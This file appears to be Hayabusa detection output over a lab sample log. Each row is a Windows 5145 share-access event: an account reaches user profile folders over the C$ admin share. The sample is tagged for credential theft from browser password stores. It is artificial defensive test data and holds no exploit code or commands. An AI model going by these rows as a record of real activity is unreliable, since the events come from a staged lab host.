2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.084 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
